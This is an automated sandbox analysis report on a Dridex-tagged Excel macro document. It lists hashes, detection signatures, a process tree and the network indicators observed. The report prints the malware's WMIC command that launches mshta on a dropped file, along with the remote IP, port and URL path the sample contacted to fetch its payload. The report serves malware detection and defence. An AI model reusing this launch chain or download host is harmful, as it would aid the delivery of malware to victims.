Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3762.xlsm

Overview

General Information

Sample Name:3762.xlsm
Analysis ID:532307
MD5:db35212aa7fbb90f60c862a82fc4f34c
SHA1:9167a3c7816d6cba5335c74da2fc2c786b9c131e
SHA256:dd589bbbfcec22650ed4aeb33606b6d9ee4b2afdce6cb2e22435f34348714f81
Tags:Dridexxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Sample execution stops while process was sleeping (likely an evasion)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7036 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 1000 cmdline: wmic process call create "mshta C:\ProgramData\LZbir.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 5348 cmdline: mshta C:\ProgramData\LZbir.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\LZbir.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\LZbir.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\LZbir.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7036, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\LZbir.rtf", ProcessId: 1000
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\LZbir.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\LZbir.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7036, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\LZbir.rtf", ProcessId: 1000

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 3762.xlsmReversingLabs: Detection: 11%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Source: global trafficTCP traffic: 192.168.2.4:49768 -> 157.230.250.107:8080
      Source: global trafficTCP traffic: 192.168.2.4:49768 -> 157.230.250.107:8080
      Source: global trafficTCP traffic: 192.168.2.4:49768 -> 157.230.250.107:8080
      Source: Joe Sandbox ViewIP Address: 157.230.250.107 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.10
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8
      Source: mshta.exe, 00000006.00000003.699233022.000001BF49909000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958349675.000001BF49909000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru
      Source: mshta.exe, 00000006.00000003.699233022.000001BF49909000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958349675.000001BF49909000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82
      Source: mshta.exe, 00000006.00000003.699233022.000001BF49909000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958349675.000001BF49909000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sa
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sassw
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswh
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhor
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhoreh
      Source: mshta.exe, 00000006.00000002.957102724.000001BF498C7000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.699201112.000001BF498CD000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf
      Source: mshta.exe, 00000006.00000002.957102724.000001BF498C7000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.699201112.000001BF498CD000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.699191847.000001BF49987000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9eF
      Source: mshta.exe, 00000006.00000003.699201112.000001BF498CD000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9eJ
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9ee
      Source: mshta.exe, 00000006.00000003.699201112.000001BF498CD000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9ez
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.10jec
      Source: mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250mObjec
      Source: EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: EXCEL.EXE, 00000000.00000002.964545334.000000000EFE0000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
      Source: EXCEL.EXE, 00000000.00000002.962752099.000000000D20F000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tablea
      Source: EXCEL.EXE, 00000000.00000003.811932990.0000000015B1C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811011891.0000000015B92000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811172377.0000000015BDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.810665104.0000000015AF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.810685067.0000000015B1C000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
      Source: EXCEL.EXE, 00000000.00000003.811932990.0000000015B1C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.810685067.0000000015B1C000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
      Source: EXCEL.EXE, 00000000.00000003.811011891.0000000015B92000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811172377.0000000015BDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.810665104.0000000015AF0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
      Source: EXCEL.EXE, 00000000.00000003.678200299.0000000012D64000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openx
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxSSExcelCShttps://excelcs.
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxb
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadAppInfoQuery15https://api.addins.omex.office
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated4
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
      Source: EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiyj0w
      Source: EXCEL.EXE, 00000000.00000003.674210580.000000000F038000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.964596499.000000000F02D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770037294.000000000F02D000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.aadrm.com
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.aadrm.com/
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/query6
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15https://api.addins.omex.office.net/appst
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplateh
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comBearer
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comCxlq
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comhttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/wy0p
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.office.net
